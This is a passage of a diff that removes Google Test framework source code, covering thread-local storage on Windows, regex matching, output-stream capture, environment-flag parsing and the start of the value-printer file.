-          std::make_pair(current_thread, ThreadLocalValues())).first;
-      StartWatcherThreadFor(current_thread);
-    }
-    ThreadLocalValues& thread_local_values = thread_local_pos->second;
-    ThreadLocalValues::iterator value_pos =
-        thread_local_values.find(thread_local_instance);
-    if (value_pos == thread_local_values.end()) {
-      value_pos =
-          thread_local_values
-              .insert(std::make_pair(
-                  thread_local_instance,
-                  linked_ptr<ThreadLocalValueHolderBase>(
-                      thread_local_instance->NewValueForCurrentThread())))
-              .first;
-    }
-    return value_pos->second.get();
-  }
-
-  static void OnThreadLocalDestroyed(
-      const ThreadLocalBase* thread_local_instance) {
-    std::vector<linked_ptr<ThreadLocalValueHolderBase> > value_holders;
-    // Clean up the ThreadLocalValues data structure while holding the lock, but
-    // defer the destruction of the ThreadLocalValueHolderBases.
-    {
-      MutexLock lock(&mutex_);
-      ThreadIdToThreadLocals* const thread_to_thread_locals =
-          GetThreadLocalsMapLocked();
-      for (ThreadIdToThreadLocals::iterator it =
-          thread_to_thread_locals->begin();
-          it != thread_to_thread_locals->end();
-          ++it) {
-        ThreadLocalValues& thread_local_values = it->second;
-        ThreadLocalValues::iterator value_pos =
-            thread_local_values.find(thread_local_instance);
-        if (value_pos != thread_local_values.end()) {
-          value_holders.push_back(value_pos->second);
-          thread_local_values.erase(value_pos);
-          // This 'if' can only be successful at most once, so theoretically we
-          // could break out of the loop here, but we don't bother doing so.
-        }
-      }
-    }
-    // Outside the lock, let the destructor for 'value_holders' deallocate the
-    // ThreadLocalValueHolderBases.
-  }
-
-  static void OnThreadExit(DWORD thread_id) {
-    GTEST_CHECK_(thread_id != 0) << ::GetLastError();
-    std::vector<linked_ptr<ThreadLocalValueHolderBase> > value_holders;
-    // Clean up the ThreadIdToThreadLocals data structure while holding the
-    // lock, but defer the destruction of the ThreadLocalValueHolderBases.
-    {
-      MutexLock lock(&mutex_);
-      ThreadIdToThreadLocals* const thread_to_thread_locals =
-          GetThreadLocalsMapLocked();
-      ThreadIdToThreadLocals::iterator thread_local_pos =
-          thread_to_thread_locals->find(thread_id);
-      if (thread_local_pos != thread_to_thread_locals->end()) {
-        ThreadLocalValues& thread_local_values = thread_local_pos->second;
-        for (ThreadLocalValues::iterator value_pos =
-            thread_local_values.begin();
-            value_pos != thread_local_values.end();
-            ++value_pos) {
-          value_holders.push_back(value_pos->second);
-        }
-        thread_to_thread_locals->erase(thread_local_pos);
-      }
-    }
-    // Outside the lock, let the destructor for 'value_holders' deallocate the
-    // ThreadLocalValueHolderBases.
-  }
-
- private:
-  // In a particular thread, maps a ThreadLocal object to its value.
-  typedef std::map<const ThreadLocalBase*,
-                   linked_ptr<ThreadLocalValueHolderBase> > ThreadLocalValues;
-  // Stores all ThreadIdToThreadLocals having values in a thread, indexed by
-  // thread's ID.
-  typedef std::map<DWORD, ThreadLocalValues> ThreadIdToThreadLocals;
-
-  // Holds the thread id and thread handle that we pass from
-  // StartWatcherThreadFor to WatcherThreadFunc.
-  typedef std::pair<DWORD, HANDLE> ThreadIdAndHandle;
-
-  static void StartWatcherThreadFor(DWORD thread_id) {
-    // The returned handle will be kept in thread_map and closed by
-    // watcher_thread in WatcherThreadFunc.
-    HANDLE thread = ::OpenThread(SYNCHRONIZE | THREAD_QUERY_INFORMATION,
-                                 FALSE,
-                                 thread_id);
-    GTEST_CHECK_(thread != NULL);
-    // We need to to pass a valid thread ID pointer into CreateThread for it
-    // to work correctly under Win98.
-    DWORD watcher_thread_id;
-    HANDLE watcher_thread = ::CreateThread(
-        NULL,   // Default security.
-        0,      // Default stack size
-        &ThreadLocalRegistryImpl::WatcherThreadFunc,
-        reinterpret_cast<LPVOID>(new ThreadIdAndHandle(thread_id, thread)),
-        CREATE_SUSPENDED,
-        &watcher_thread_id);
-    GTEST_CHECK_(watcher_thread != NULL);
-    // Give the watcher thread the same priority as ours to avoid being
-    // blocked by it.
-    ::SetThreadPriority(watcher_thread,
-                        ::GetThreadPriority(::GetCurrentThread()));
-    ::ResumeThread(watcher_thread);
-    ::CloseHandle(watcher_thread);
-  }
-
-  // Monitors exit from a given thread and notifies those
-  // ThreadIdToThreadLocals about thread termination.
-  static DWORD WINAPI WatcherThreadFunc(LPVOID param) {
-    const ThreadIdAndHandle* tah =
-        reinterpret_cast<const ThreadIdAndHandle*>(param);
-    GTEST_CHECK_(
-        ::WaitForSingleObject(tah->second, INFINITE) == WAIT_OBJECT_0);
-    OnThreadExit(tah->first);
-    ::CloseHandle(tah->second);
-    delete tah;
-    return 0;
-  }
-
-  // Returns map of thread local instances.
-  static ThreadIdToThreadLocals* GetThreadLocalsMapLocked() {
-    mutex_.AssertHeld();
-    static ThreadIdToThreadLocals* map = new ThreadIdToThreadLocals;
-    return map;
-  }
-
-  // Protects access to GetThreadLocalsMapLocked() and its return value.
-  static Mutex mutex_;
-  // Protects access to GetThreadMapLocked() and its return value.
-  static Mutex thread_map_mutex_;
-};
-
-Mutex ThreadLocalRegistryImpl::mutex_(Mutex::kStaticMutex);
-Mutex ThreadLocalRegistryImpl::thread_map_mutex_(Mutex::kStaticMutex);
-
-ThreadLocalValueHolderBase* ThreadLocalRegistry::GetValueOnCurrentThread(
-      const ThreadLocalBase* thread_local_instance) {
-  return ThreadLocalRegistryImpl::GetValueOnCurrentThread(
-      thread_local_instance);
-}
-
-void ThreadLocalRegistry::OnThreadLocalDestroyed(
-      const ThreadLocalBase* thread_local_instance) {
-  ThreadLocalRegistryImpl::OnThreadLocalDestroyed(thread_local_instance);
-}
-
-#endif  // GTEST_IS_THREADSAFE && GTEST_OS_WINDOWS
-
-#if GTEST_USES_POSIX_RE
-
-// Implements RE.  Currently only needed for death tests.
-
-RE::~RE() {
-  if (is_valid_) {
-    // regfree'ing an invalid regex might crash because the content
-    // of the regex is undefined. Since the regex's are essentially
-    // the same, one cannot be valid (or invalid) without the other
-    // being so too.
-    regfree(&partial_regex_);
-    regfree(&full_regex_);
-  }
-  free(const_cast<char*>(pattern_));
-}
-
-// Returns true iff regular expression re matches the entire str.
-bool RE::FullMatch(const char* str, const RE& re) {
-  if (!re.is_valid_) return false;
-
-  regmatch_t match;
-  return regexec(&re.full_regex_, str, 1, &match, 0) == 0;
-}
-
-// Returns true iff regular expression re matches a substring of str
-// (including str itself).
-bool RE::PartialMatch(const char* str, const RE& re) {
-  if (!re.is_valid_) return false;
-
-  regmatch_t match;
-  return regexec(&re.partial_regex_, str, 1, &match, 0) == 0;
-}
-
-// Initializes an RE from its string representation.
-void RE::Init(const char* regex) {
-  pattern_ = posix::StrDup(regex);
-
-  // Reserves enough bytes to hold the regular expression used for a
-  // full match.
-  const size_t full_regex_len = strlen(regex) + 10;
-  char* const full_pattern = new char[full_regex_len];
-
-  snprintf(full_pattern, full_regex_len, "^(%s)$", regex);
-  is_valid_ = regcomp(&full_regex_, full_pattern, REG_EXTENDED) == 0;
-  // We want to call regcomp(&partial_regex_, ...) even if the
-  // previous expression returns false.  Otherwise partial_regex_ may
-  // not be properly initialized can may cause trouble when it's
-  // freed.
-  //
-  // Some implementation of POSIX regex (e.g. on at least some
-  // versions of Cygwin) doesn't accept the empty string as a valid
-  // regex.  We change it to an equivalent form "()" to be safe.
-  if (is_valid_) {
-    const char* const partial_regex = (*regex == '\0') ? "()" : regex;
-    is_valid_ = regcomp(&partial_regex_, partial_regex, REG_EXTENDED) == 0;
-  }
-  EXPECT_TRUE(is_valid_)
-      << "Regular expression \"" << regex
-      << "\" is not a valid POSIX Extended regular expression.";
-
-  delete[] full_pattern;
-}
-
-#elif GTEST_USES_SIMPLE_RE
-
-// Returns true iff ch appears anywhere in str (excluding the
-// terminating '\0' character).
-bool IsInSet(char ch, const char* str) {
-  return ch != '\0' && strchr(str, ch) != NULL;
-}
-
-// Returns true iff ch belongs to the given classification.  Unlike
-// similar functions in <ctype.h>, these aren't affected by the
-// current locale.
-bool IsAsciiDigit(char ch) { return '0' <= ch && ch <= '9'; }
-bool IsAsciiPunct(char ch) {
-  return IsInSet(ch, "^-!\"#$%&'()*+,./:;<=>?@[\\]_`{|}~");
-}
-bool IsRepeat(char ch) { return IsInSet(ch, "?*+"); }
-bool IsAsciiWhiteSpace(char ch) { return IsInSet(ch, " \f\n\r\t\v"); }
-bool IsAsciiWordChar(char ch) {
-  return ('a' <= ch && ch <= 'z') || ('A' <= ch && ch <= 'Z') ||
-      ('0' <= ch && ch <= '9') || ch == '_';
-}
-
-// Returns true iff "\\c" is a supported escape sequence.
-bool IsValidEscape(char c) {
-  return (IsAsciiPunct(c) || IsInSet(c, "dDfnrsStvwW"));
-}
-
-// Returns true iff the given atom (specified by escaped and pattern)
-// matches ch.  The result is undefined if the atom is invalid.
-bool AtomMatchesChar(bool escaped, char pattern_char, char ch) {
-  if (escaped) {  // "\\p" where p is pattern_char.
-    switch (pattern_char) {
-      case 'd': return IsAsciiDigit(ch);
-      case 'D': return !IsAsciiDigit(ch);
-      case 'f': return ch == '\f';
-      case 'n': return ch == '\n';
-      case 'r': return ch == '\r';
-      case 's': return IsAsciiWhiteSpace(ch);
-      case 'S': return !IsAsciiWhiteSpace(ch);
-      case 't': return ch == '\t';
-      case 'v': return ch == '\v';
-      case 'w': return IsAsciiWordChar(ch);
-      case 'W': return !IsAsciiWordChar(ch);
-    }
-    return IsAsciiPunct(pattern_char) && pattern_char == ch;
-  }
-
-  return (pattern_char == '.' && ch != '\n') || pattern_char == ch;
-}
-
-// Helper function used by ValidateRegex() to format error messages.
-std::string FormatRegexSyntaxError(const char* regex, int index) {
-  return (Message() << "Syntax error at index " << index
-          << " in simple regular expression \"" << regex << "\": ").GetString();
-}
-
-// Generates non-fatal failures and returns false if regex is invalid;
-// otherwise returns true.
-bool ValidateRegex(const char* regex) {
-  if (regex == NULL) {
-    // TODO(wan@google.com): fix the source file location in the
-    // assertion failures to match where the regex is used in user
-    // code.
-    ADD_FAILURE() << "NULL is not a valid simple regular expression.";
-    return false;
-  }
-
-  bool is_valid = true;
-
-  // True iff ?, *, or + can follow the previous atom.
-  bool prev_repeatable = false;
-  for (int i = 0; regex[i]; i++) {
-    if (regex[i] == '\\') {  // An escape sequence
-      i++;
-      if (regex[i] == '\0') {
-        ADD_FAILURE() << FormatRegexSyntaxError(regex, i - 1)
-                      << "'\\' cannot appear at the end.";
-        return false;
-      }
-
-      if (!IsValidEscape(regex[i])) {
-        ADD_FAILURE() << FormatRegexSyntaxError(regex, i - 1)
-                      << "invalid escape sequence \"\\" << regex[i] << "\".";
-        is_valid = false;
-      }
-      prev_repeatable = true;
-    } else {  // Not an escape sequence.
-      const char ch = regex[i];
-
-      if (ch == '^' && i > 0) {
-        ADD_FAILURE() << FormatRegexSyntaxError(regex, i)
-                      << "'^' can only appear at the beginning.";
-        is_valid = false;
-      } else if (ch == '$' && regex[i + 1] != '\0') {
-        ADD_FAILURE() << FormatRegexSyntaxError(regex, i)
-                      << "'$' can only appear at the end.";
-        is_valid = false;
-      } else if (IsInSet(ch, "()[]{}|")) {
-        ADD_FAILURE() << FormatRegexSyntaxError(regex, i)
-                      << "'" << ch << "' is unsupported.";
-        is_valid = false;
-      } else if (IsRepeat(ch) && !prev_repeatable) {
-        ADD_FAILURE() << FormatRegexSyntaxError(regex, i)
-                      << "'" << ch << "' can only follow a repeatable token.";
-        is_valid = false;
-      }
-
-      prev_repeatable = !IsInSet(ch, "^$?*+");
-    }
-  }
-
-  return is_valid;
-}
-
-// Matches a repeated regex atom followed by a valid simple regular
-// expression.  The regex atom is defined as c if escaped is false,
-// or \c otherwise.  repeat is the repetition meta character (?, *,
-// or +).  The behavior is undefined if str contains too many
-// characters to be indexable by size_t, in which case the test will
-// probably time out anyway.  We are fine with this limitation as
-// std::string has it too.
-bool MatchRepetitionAndRegexAtHead(
-    bool escaped, char c, char repeat, const char* regex,
-    const char* str) {
-  const size_t min_count = (repeat == '+') ? 1 : 0;
-  const size_t max_count = (repeat == '?') ? 1 :
-      static_cast<size_t>(-1) - 1;
-  // We cannot call numeric_limits::max() as it conflicts with the
-  // max() macro on Windows.
-
-  for (size_t i = 0; i <= max_count; ++i) {
-    // We know that the atom matches each of the first i characters in str.
-    if (i >= min_count && MatchRegexAtHead(regex, str + i)) {
-      // We have enough matches at the head, and the tail matches too.
-      // Since we only care about *whether* the pattern matches str
-      // (as opposed to *how* it matches), there is no need to find a
-      // greedy match.
-      return true;
-    }
-    if (str[i] == '\0' || !AtomMatchesChar(escaped, c, str[i]))
-      return false;
-  }
-  return false;
-}
-
-// Returns true iff regex matches a prefix of str.  regex must be a
-// valid simple regular expression and not start with "^", or the
-// result is undefined.
-bool MatchRegexAtHead(const char* regex, const char* str) {
-  if (*regex == '\0')  // An empty regex matches a prefix of anything.
-    return true;
-
-  // "$" only matches the end of a string.  Note that regex being
-  // valid guarantees that there's nothing after "$" in it.
-  if (*regex == '$')
-    return *str == '\0';
-
-  // Is the first thing in regex an escape sequence?
-  const bool escaped = *regex == '\\';
-  if (escaped)
-    ++regex;
-  if (IsRepeat(regex[1])) {
-    // MatchRepetitionAndRegexAtHead() calls MatchRegexAtHead(), so
-    // here's an indirect recursion.  It terminates as the regex gets
-    // shorter in each recursion.
-    return MatchRepetitionAndRegexAtHead(
-        escaped, regex[0], regex[1], regex + 2, str);
-  } else {
-    // regex isn't empty, isn't "$", and doesn't start with a
-    // repetition.  We match the first atom of regex with the first
-    // character of str and recurse.
-    return (*str != '\0') && AtomMatchesChar(escaped, *regex, *str) &&
-        MatchRegexAtHead(regex + 1, str + 1);
-  }
-}
-
-// Returns true iff regex matches any substring of str.  regex must be
-// a valid simple regular expression, or the result is undefined.
-//
-// The algorithm is recursive, but the recursion depth doesn't exceed
-// the regex length, so we won't need to worry about running out of
-// stack space normally.  In rare cases the time complexity can be
-// exponential with respect to the regex length + the string length,
-// but usually it's must faster (often close to linear).
-bool MatchRegexAnywhere(const char* regex, const char* str) {
-  if (regex == NULL || str == NULL)
-    return false;
-
-  if (*regex == '^')
-    return MatchRegexAtHead(regex + 1, str);
-
-  // A successful match can be anywhere in str.
-  do {
-    if (MatchRegexAtHead(regex, str))
-      return true;
-  } while (*str++ != '\0');
-  return false;
-}
-
-// Implements the RE class.
-
-RE::~RE() {
-  free(const_cast<char*>(pattern_));
-  free(const_cast<char*>(full_pattern_));
-}
-
-// Returns true iff regular expression re matches the entire str.
-bool RE::FullMatch(const char* str, const RE& re) {
-  return re.is_valid_ && MatchRegexAnywhere(re.full_pattern_, str);
-}
-
-// Returns true iff regular expression re matches a substring of str
-// (including str itself).
-bool RE::PartialMatch(const char* str, const RE& re) {
-  return re.is_valid_ && MatchRegexAnywhere(re.pattern_, str);
-}
-
-// Initializes an RE from its string representation.
-void RE::Init(const char* regex) {
-  pattern_ = full_pattern_ = NULL;
-  if (regex != NULL) {
-    pattern_ = posix::StrDup(regex);
-  }
-
-  is_valid_ = ValidateRegex(regex);
-  if (!is_valid_) {
-    // No need to calculate the full pattern when the regex is invalid.
-    return;
-  }
-
-  const size_t len = strlen(regex);
-  // Reserves enough bytes to hold the regular expression used for a
-  // full match: we need space to prepend a '^', append a '$', and
-  // terminate the string with '\0'.
-  char* buffer = static_cast<char*>(malloc(len + 3));
-  full_pattern_ = buffer;
-
-  if (*regex != '^')
-    *buffer++ = '^';  // Makes sure full_pattern_ starts with '^'.
-
-  // We don't use snprintf or strncpy, as they trigger a warning when
-  // compiled with VC++ 8.0.
-  memcpy(buffer, regex, len);
-  buffer += len;
-
-  if (len == 0 || regex[len - 1] != '$')
-    *buffer++ = '$';  // Makes sure full_pattern_ ends with '$'.
-
-  *buffer = '\0';
-}
-
-#endif  // GTEST_USES_POSIX_RE
-
-const char kUnknownFile[] = "unknown file";
-
-// Formats a source file path and a line number as they would appear
-// in an error message from the compiler used to compile this code.
-GTEST_API_ ::std::string FormatFileLocation(const char* file, int line) {
-  const std::string file_name(file == NULL ? kUnknownFile : file);
-
-  if (line < 0) {
-    return file_name + ":";
-  }
-#ifdef _MSC_VER
-  return file_name + "(" + StreamableToString(line) + "):";
-#else
-  return file_name + ":" + StreamableToString(line) + ":";
-#endif  // _MSC_VER
-}
-
-// Formats a file location for compiler-independent XML output.
-// Although this function is not platform dependent, we put it next to
-// FormatFileLocation in order to contrast the two functions.
-// Note that FormatCompilerIndependentFileLocation() does NOT append colon
-// to the file location it produces, unlike FormatFileLocation().
-GTEST_API_ ::std::string FormatCompilerIndependentFileLocation(
-    const char* file, int line) {
-  const std::string file_name(file == NULL ? kUnknownFile : file);
-
-  if (line < 0)
-    return file_name;
-  else
-    return file_name + ":" + StreamableToString(line);
-}
-
-
-GTestLog::GTestLog(GTestLogSeverity severity, const char* file, int line)
-    : severity_(severity) {
-  const char* const marker =
-      severity == GTEST_INFO ?    "[  INFO ]" :
-      severity == GTEST_WARNING ? "[WARNING]" :
-      severity == GTEST_ERROR ?   "[ ERROR ]" : "[ FATAL ]";
-  GetStream() << ::std::endl << marker << " "
-              << FormatFileLocation(file, line).c_str() << ": ";
-}
-
-// Flushes the buffers and, if severity is GTEST_FATAL, aborts the program.
-GTestLog::~GTestLog() {
-  GetStream() << ::std::endl;
-  if (severity_ == GTEST_FATAL) {
-    fflush(stderr);
-    posix::Abort();
-  }
-}
-// Disable Microsoft deprecation warnings for POSIX functions called from
-// this class (creat, dup, dup2, and close)
-GTEST_DISABLE_MSC_WARNINGS_PUSH_(4996)
-
-#if GTEST_HAS_STREAM_REDIRECTION
-
-// Object that captures an output stream (stdout/stderr).
-class CapturedStream {
- public:
-  // The ctor redirects the stream to a temporary file.
-  explicit CapturedStream(int fd) : fd_(fd), uncaptured_fd_(dup(fd)) {
-# if GTEST_OS_WINDOWS
-    char temp_dir_path[MAX_PATH + 1] = { '\0' };  // NOLINT
-    char temp_file_path[MAX_PATH + 1] = { '\0' };  // NOLINT
-
-    ::GetTempPathA(sizeof(temp_dir_path), temp_dir_path);
-    const UINT success = ::GetTempFileNameA(temp_dir_path,
-                                            "gtest_redir",
-                                            0,  // Generate unique file name.
-                                            temp_file_path);
-    GTEST_CHECK_(success != 0)
-        << "Unable to create a temporary file in " << temp_dir_path;
-    const int captured_fd = creat(temp_file_path, _S_IREAD | _S_IWRITE);
-    GTEST_CHECK_(captured_fd != -1) << "Unable to open temporary file "
-                                    << temp_file_path;
-    filename_ = temp_file_path;
-# else
-    // There's no guarantee that a test has write access to the current
-    // directory, so we create the temporary file in the /tmp directory
-    // instead. We use /tmp on most systems, and /sdcard on Android.
-    // That's because Android doesn't have /tmp.
-#  if GTEST_OS_LINUX_ANDROID
-    // Note: Android applications are expected to call the framework's
-    // Context.getExternalStorageDirectory() method through JNI to get
-    // the location of the world-writable SD Card directory. However,
-    // this requires a Context handle, which cannot be retrieved
-    // globally from native code. Doing so also precludes running the
-    // code as part of a regular standalone executable, which doesn't
-    // run in a Dalvik process (e.g. when running it through 'adb shell').
-    //
-    // The location /sdcard is directly accessible from native code
-    // and is the only location (unofficially) supported by the Android
-    // team. It's generally a symlink to the real SD Card mount point
-    // which can be /mnt/sdcard, /mnt/sdcard0, /system/media/sdcard, or
-    // other OEM-customized locations. Never rely on these, and always
-    // use /sdcard.
-    char name_template[] = "/sdcard/gtest_captured_stream.XXXXXX";
-#  else
-    char name_template[] = "/tmp/captured_stream.XXXXXX";
-#  endif  // GTEST_OS_LINUX_ANDROID
-    const int captured_fd = mkstemp(name_template);
-    filename_ = name_template;
-# endif  // GTEST_OS_WINDOWS
-    fflush(NULL);
-    dup2(captured_fd, fd_);
-    close(captured_fd);
-  }
-
-  ~CapturedStream() {
-    remove(filename_.c_str());
-  }
-
-  std::string GetCapturedString() {
-    if (uncaptured_fd_ != -1) {
-      // Restores the original stream.
-      fflush(NULL);
-      dup2(uncaptured_fd_, fd_);
-      close(uncaptured_fd_);
-      uncaptured_fd_ = -1;
-    }
-
-    FILE* const file = posix::FOpen(filename_.c_str(), "r");
-    const std::string content = ReadEntireFile(file);
-    posix::FClose(file);
-    return content;
-  }
-
- private:
-  // Reads the entire content of a file as an std::string.
-  static std::string ReadEntireFile(FILE* file);
-
-  // Returns the size (in bytes) of a file.
-  static size_t GetFileSize(FILE* file);
-
-  const int fd_;  // A stream to capture.
-  int uncaptured_fd_;
-  // Name of the temporary file holding the stderr output.
-  ::std::string filename_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(CapturedStream);
-};
-
-// Returns the size (in bytes) of a file.
-size_t CapturedStream::GetFileSize(FILE* file) {
-  fseek(file, 0, SEEK_END);
-  return static_cast<size_t>(ftell(file));
-}
-
-// Reads the entire content of a file as a string.
-std::string CapturedStream::ReadEntireFile(FILE* file) {
-  const size_t file_size = GetFileSize(file);
-  char* const buffer = new char[file_size];
-
-  size_t bytes_last_read = 0;  // # of bytes read in the last fread()
-  size_t bytes_read = 0;       // # of bytes read so far
-
-  fseek(file, 0, SEEK_SET);
-
-  // Keeps reading the file until we cannot read further or the
-  // pre-determined file size is reached.
-  do {
-    bytes_last_read = fread(buffer+bytes_read, 1, file_size-bytes_read, file);
-    bytes_read += bytes_last_read;
-  } while (bytes_last_read > 0 && bytes_read < file_size);
-
-  const std::string content(buffer, bytes_read);
-  delete[] buffer;
-
-  return content;
-}
-
-GTEST_DISABLE_MSC_WARNINGS_POP_()
-
-static CapturedStream* g_captured_stderr = NULL;
-static CapturedStream* g_captured_stdout = NULL;
-
-// Starts capturing an output stream (stdout/stderr).
-void CaptureStream(int fd, const char* stream_name, CapturedStream** stream) {
-  if (*stream != NULL) {
-    GTEST_LOG_(FATAL) << "Only one " << stream_name
-                      << " capturer can exist at a time.";
-  }
-  *stream = new CapturedStream(fd);
-}
-
-// Stops capturing the output stream and returns the captured string.
-std::string GetCapturedStream(CapturedStream** captured_stream) {
-  const std::string content = (*captured_stream)->GetCapturedString();
-
-  delete *captured_stream;
-  *captured_stream = NULL;
-
-  return content;
-}
-
-// Starts capturing stdout.
-void CaptureStdout() {
-  CaptureStream(kStdOutFileno, "stdout", &g_captured_stdout);
-}
-
-// Starts capturing stderr.
-void CaptureStderr() {
-  CaptureStream(kStdErrFileno, "stderr", &g_captured_stderr);
-}
-
-// Stops capturing stdout and returns the captured string.
-std::string GetCapturedStdout() {
-  return GetCapturedStream(&g_captured_stdout);
-}
-
-// Stops capturing stderr and returns the captured string.
-std::string GetCapturedStderr() {
-  return GetCapturedStream(&g_captured_stderr);
-}
-
-#endif  // GTEST_HAS_STREAM_REDIRECTION
-
-#if GTEST_HAS_DEATH_TEST
-
-// A copy of all command line arguments.  Set by InitGoogleTest().
-::std::vector<testing::internal::string> g_argvs;
-
-static const ::std::vector<testing::internal::string>* g_injected_test_argvs =
-                                        NULL;  // Owned.
-
-void SetInjectableArgvs(const ::std::vector<testing::internal::string>* argvs) {
-  if (g_injected_test_argvs != argvs)
-    delete g_injected_test_argvs;
-  g_injected_test_argvs = argvs;
-}
-
-const ::std::vector<testing::internal::string>& GetInjectableArgvs() {
-  if (g_injected_test_argvs != NULL) {
-    return *g_injected_test_argvs;
-  }
-  return g_argvs;
-}
-#endif  // GTEST_HAS_DEATH_TEST
-
-#if GTEST_OS_WINDOWS_MOBILE
-namespace posix {
-void Abort() {
-  DebugBreak();
-  TerminateProcess(GetCurrentProcess(), 1);
-}
-}  // namespace posix
-#endif  // GTEST_OS_WINDOWS_MOBILE
-
-// Returns the name of the environment variable corresponding to the
-// given flag.  For example, FlagToEnvVar("foo") will return
-// "GTEST_FOO" in the open-source version.
-static std::string FlagToEnvVar(const char* flag) {
-  const std::string full_flag =
-      (Message() << GTEST_FLAG_PREFIX_ << flag).GetString();
-
-  Message env_var;
-  for (size_t i = 0; i != full_flag.length(); i++) {
-    env_var << ToUpper(full_flag.c_str()[i]);
-  }
-
-  return env_var.GetString();
-}
-
-// Parses 'str' for a 32-bit signed integer.  If successful, writes
-// the result to *value and returns true; otherwise leaves *value
-// unchanged and returns false.
-bool ParseInt32(const Message& src_text, const char* str, Int32* value) {
-  // Parses the environment variable as a decimal integer.
-  char* end = NULL;
-  const long long_value = strtol(str, &end, 10);  // NOLINT
-
-  // Has strtol() consumed all characters in the string?
-  if (*end != '\0') {
-    // No - an invalid character was encountered.
-    Message msg;
-    msg << "WARNING: " << src_text
-        << " is expected to be a 32-bit integer, but actually"
-        << " has value \"" << str << "\".\n";
-    printf("%s", msg.GetString().c_str());
-    fflush(stdout);
-    return false;
-  }
-
-  // Is the parsed value in the range of an Int32?
-  const Int32 result = static_cast<Int32>(long_value);
-  if (long_value == LONG_MAX || long_value == LONG_MIN ||
-      // The parsed value overflows as a long.  (strtol() returns
-      // LONG_MAX or LONG_MIN when the input overflows.)
-      result != long_value
-      // The parsed value overflows as an Int32.
-      ) {
-    Message msg;
-    msg << "WARNING: " << src_text
-        << " is expected to be a 32-bit integer, but actually"
-        << " has value " << str << ", which overflows.\n";
-    printf("%s", msg.GetString().c_str());
-    fflush(stdout);
-    return false;
-  }
-
-  *value = result;
-  return true;
-}
-
-// Reads and returns the Boolean environment variable corresponding to
-// the given flag; if it's not set, returns default_value.
-//
-// The value is considered true iff it's not "0".
-bool BoolFromGTestEnv(const char* flag, bool default_value) {
-  const std::string env_var = FlagToEnvVar(flag);
-  const char* const string_value = posix::GetEnv(env_var.c_str());
-  return string_value == NULL ?
-      default_value : strcmp(string_value, "0") != 0;
-}
-
-// Reads and returns a 32-bit integer stored in the environment
-// variable corresponding to the given flag; if it isn't set or
-// doesn't represent a valid 32-bit integer, returns default_value.
-Int32 Int32FromGTestEnv(const char* flag, Int32 default_value) {
-  const std::string env_var = FlagToEnvVar(flag);
-  const char* const string_value = posix::GetEnv(env_var.c_str());
-  if (string_value == NULL) {
-    // The environment variable is not set.
-    return default_value;
-  }
-
-  Int32 result = default_value;
-  if (!ParseInt32(Message() << "Environment variable " << env_var,
-                  string_value, &result)) {
-    printf("The default value %s is used.\n",
-           (Message() << default_value).GetString().c_str());
-    fflush(stdout);
-    return default_value;
-  }
-
-  return result;
-}
-
-// Reads and returns the string environment variable corresponding to
-// the given flag; if it's not set, returns default_value.
-const char* StringFromGTestEnv(const char* flag, const char* default_value) {
-  const std::string env_var = FlagToEnvVar(flag);
-  const char* const value = posix::GetEnv(env_var.c_str());
-  return value == NULL ? default_value : value;
-}
-
-}  // namespace internal
-}  // namespace testing
-// Copyright 2007, Google Inc.
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Author: wan@google.com (Zhanyong Wan)
-
-// Google Test - The Google C++ Testing Framework
-//
-// This file implements a universal value printer that can print a
-// value of any type T:
-//
-//   void ::testing::internal::UniversalPrinter<T>::Print(value, ostream_ptr);
-//
-// It uses the << operator when possible, and prints the bytes in the
-// object otherwise.  A user can override its behavior for a class
-// type Foo by defining either operator<<(::std::ostream&, const Foo&)
-// or void PrintTo(const Foo&, ::std::ostream*) in the namespace that
-// defines Foo.
-
-#include <ctype.h>
-#include <stdio.h>
-#include <cwchar>
-#include <ostream>  // NOLINT
-#include <string>
-
-namespace testing {
-
-namespace {
-
-using ::std::ostream;
-
-// Prints a segment of bytes in the given object.
-GTEST_ATTRIBUTE_NO_SANITIZE_MEMORY_
-GTEST_ATTRIBUTE_NO_SANITIZE_ADDRESS_
-GTEST_ATTRIBUTE_NO_SANITIZE_THREAD_
-void PrintByteSegmentInObjectTo(const unsigned char* obj_bytes, size_t start,
-                                size_t count, ostream* os) {
-  char text[5] = "";
-  for (size_t i = 0; i != count; i++) {
-    const size_t j = start + i;
-    if (i != 0) {
-      // Organizes the bytes into groups of 2 for easy parsing by
-      // human.
-      if ((j % 2) == 0)
-        *os << ' ';
-      else
-        *os << '-';
-    }
-    GTEST_SNPRINTF_(text, sizeof(text), "%02X", obj_bytes[j]);
-    *os << text;
-  }
-}
-
-// Prints the bytes in the given value to the given ostream.
-void PrintBytesInObjectToImpl(const unsigned char* obj_bytes, size_t count,
-                              ostream* os) {
-  // Tells the user how big the object is.
-  *os << count << "-byte object <";
-
-  const size_t kThreshold = 132;
-  const size_t kChunkSize = 64;
-  // If the object size is bigger than kThreshold, we'll have to omit
-  // some details by printing only the first and the last kChunkSize
-  // bytes.
-  // TODO(wan): let the user control the threshold using a flag.
-  if (count < kThreshold) {
-    PrintByteSegmentInObjectTo(obj_bytes, 0, count, os);
-  } else {
